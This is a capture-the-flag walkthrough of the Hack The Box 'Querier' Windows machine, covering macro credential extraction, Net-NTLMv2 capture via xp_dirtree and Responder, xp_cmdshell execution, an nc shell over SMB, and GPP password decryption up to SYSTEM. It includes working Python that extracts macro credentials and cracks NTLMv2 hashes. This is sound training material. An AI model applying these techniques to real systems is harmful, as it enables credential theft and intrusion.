HTB | Querier
This is a Windows box. You can find it here.
Skills learned
Excel macros (recovering credentials from vbaProject.bin)
MSSQL: xp_dirtree to capture Net-NTLMv2 with Responder, xp_cmdshell for command execution
PowerUp (Group Policy Preferences passwords)
Nmap
IP: 10.10.10.125


Ports 139 and 445
smbclient

SMB allows an anonymous (null-session) connection to the Reports share.

Get the file it contains.

Foothold/shell
The file is a Microsoft Excel 2007+ workbook (Office Open XML). That format is just a ZIP archive, so unzip it to get at its parts.


Found vbaProject.bin in the xl folder; this is the embedded VBA macro project.

It contains a username and password. We can use these credentials to log in to MSSQL (port 1433).
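The macro-recovery step above, as an added example that is not part of the original write-up: unpack an Office Open XML workbook, locate the embedded xl/vbaProject.bin, and pull credential-looking string literals out of it the way `strings` would. The workbook, the macro bytes, the server name QUERIER and the password value are all constructed for this example; only the user name reporting comes from the write-up.

```python
import io
import re
import zipfile

# Constructed sample: a minimal .xlsm-style package whose xl/vbaProject.bin
# carries a connection string. A real vbaProject.bin stores VBA source
# MS-LZ compressed, but string literals usually survive as readable runs,
# which is what `strings` surfaces. The password is a placeholder, not the
# one from the box.
SAMPLE_VBA_BIN = (
    b"\x01\x16\x03\x00Attribute VB_Name = \"ThisWorkbook\"\x00\x00"
    b"Private Sub Workbook_Open()\x00\x00"
    b"conn = \"Driver={SQL Server};Server=QUERIER;Trusted_connection=no;"
    b"UID=reporting;PWD=Example_Password_1\"\x00\x00"
    b"End Sub\x00"
)


def build_sample_xlsm() -> bytes:
    """Build the constructed workbook in memory (an .xlsm is only a ZIP)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", SAMPLE_VBA_BIN)
    return buf.getvalue()


def macro_members(xlsm: bytes) -> list:
    """Names of embedded VBA projects; a non-empty list means the file has macros."""
    with zipfile.ZipFile(io.BytesIO(xlsm)) as z:
        return [n for n in z.namelist() if n.lower().endswith("vbaproject.bin")]


def read_member(xlsm: bytes, name: str) -> bytes:
    with zipfile.ZipFile(io.BytesIO(xlsm)) as z:
        return z.read(name)


def printable_strings(blob: bytes, min_len: int = 8) -> list:
    """Equivalent of `strings -n 8`: runs of printable ASCII of at least min_len."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


# Keys that typically appear in ADO/ODBC connection strings.
CRED_RE = re.compile(r"(?i)\b(server|uid|user id|pwd|password)=([^;\"]+)")


def find_credentials(xlsm: bytes) -> dict:
    """Scan every embedded VBA project for connection-string credentials."""
    found = {}
    for name in macro_members(xlsm):
        for s in printable_strings(read_member(xlsm, name)):
            for key, val in CRED_RE.findall(s):
                found[key.lower()] = val
    return found


if __name__ == "__main__":
    sample = build_sample_xlsm()
    print("macro members:", macro_members(sample))
    print("credentials:", find_credentials(sample))
```

Point find_credentials at the bytes of a real .xlsm/.docm to get the same result as unzipping and running strings by hand; if macro_members returns an empty list the file carries no VBA at all.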


To check what permissions we have:

I can check out the databases available:

Capture Net-NTLMv2
xp_dirtree makes SQL Server list a directory, and it accepts a UNC path. If I point it at a share on my host, the server's service account authenticates to my machine over SMB, where Responder is listening to capture the Net-NTLMv2 response. This works as the low-privileged reporting user because xp_dirtree does not require sysadmin, and the hash we get belongs to the service account running SQL Server, not to the login we used.

Next, I'll issue the xp_dirtree call against an SMB share (that doesn't exist) on my host:

On the Responder side we have the hash:

Since it is Net-NTLMv2, the hashcat mode is -m 5600.
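What Responder hands us and what hashcat -m 5600 does with it, as an added example that is not part of the original write-up. The block builds a Net-NTLMv2 response the way the SQL Server service account's SMB client would (NT hash = MD4 of the UTF-16LE password; NTLMv2 hash = HMAC-MD5 of that keyed over the upper-cased user name plus domain; NTProofStr = HMAC-MD5 over server challenge plus blob), emits it in the hashcat 5600 line format, then recovers the password from a small wordlist by recomputing NTProofStr per candidate. MD4 is implemented inline because OpenSSL 3 builds of hashlib often disable it. The user name mssql-svc is from the write-up; the domain QUERIER, the server challenge, the blob and the password "Password1" are constructed for the example.

```python
import hashlib
import hmac
import struct

M = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & M


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); NTLM's NT hash is MD4 over the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = _rotl((a + F(b, c, d) + X[i]) & M, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _rotl((a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & M, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & M, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(x + y) & M for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    # Only the user name is upper-cased; the domain is used exactly as the client sent it.
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def to_hashcat_5600(user, domain, server_challenge, proof, blob) -> str:
    """Responder's 'NTLMv2-SSP Hash' line: user::DOMAIN:challenge:NTProofStr:blob."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_5600(line: str) -> dict:
    """Sanity-check a captured line before spending GPU time on it."""
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a hashcat -m 5600 line")
    user, _, domain, chal, proof, blob = parts
    # 8-byte server challenge, 16-byte NTProofStr, blob starting with RespType 01 01 00 00
    if len(chal) != 16 or len(proof) != 32 or len(blob) % 2 or blob[:8].lower() != "01010000":
        raise ValueError("malformed Net-NTLMv2 fields")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack_5600(line: str, wordlist):
    """What hashcat -m 5600 does: recompute NTProofStr per candidate and compare."""
    h = parse_5600(line)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, h["user"], h["domain"], h["challenge"], h["blob"]), h["proof"]):
            return candidate
    return None


# Constructed capture values (server challenge, timestamp, client challenge, empty target info).
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = (bytes.fromhex("0101000000000000") + bytes.fromhex("00d1c2a4a1e2d601")
        + bytes.fromhex("a1b2c3d4e5f60718") + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)


def build_sample_capture(password="Password1", user="mssql-svc", domain="QUERIER") -> str:
    proof = nt_proof(password, user, domain, SERVER_CHALLENGE, BLOB)
    return to_hashcat_5600(user, domain, SERVER_CHALLENGE, proof, BLOB)


if __name__ == "__main__":
    line = build_sample_capture()
    print(line)
    print("cracked:", crack_5600(line, ["letmein", "Summer2019", "Password1"]))
```

The parser is the useful check before a long hashcat run: a line that fails it (wrong field count, odd-length blob, blob not starting with 01010000) is usually a truncated copy-paste from the Responder log rather than a bad capture.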


Let's connect with the cracked mssql-svc credentials.

We can execute OS commands through xp_cmdshell.

Note, the actual syntax to run a command is EXEC xp_cmdshell '[command]';. However, the client I'm using to connect, mssqlclient.py, has a built-in command to run a command over xp_cmdshell, so I can just type xp_cmdshell [command]. Commands run as the SQL Server service account, mssql-svc here.
As mssql-svc, I can enable xp_cmdshell (something I couldn't do as reporting, since changing server configuration needs ALTER SETTINGS, which only sysadmin and serveradmin roles hold). Just like running a command, there is an alias to do this in the script. The full commands are (from Microsoft's documentation (https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017)): sp_configure 'show advanced options', 1 followed by RECONFIGURE, then sp_configure 'xp_cmdshell', 1 followed by RECONFIGURE.

To get a full shell on the box, there are many ways to go. I'll host nc on an SMB server on my machine and have Windows run it directly from that share via xp_cmdshell, so nothing has to be written to disk first.



Found user.txt.

Priv Esc
Let's copy PowerUp.ps1 over and run its checks.


In the cached Group Policy Preferences (GPP) file, we found the Administrator password. GPP stores it as a cpassword attribute encrypted with an AES key Microsoft published (MS14-025), so PowerUp decrypts it on the spot.

Since we have the Administrator password, we can use psexec, which needs admin rights on the target to drop its service binary into ADMIN$.

We are in as NT AUTHORITY\SYSTEM.
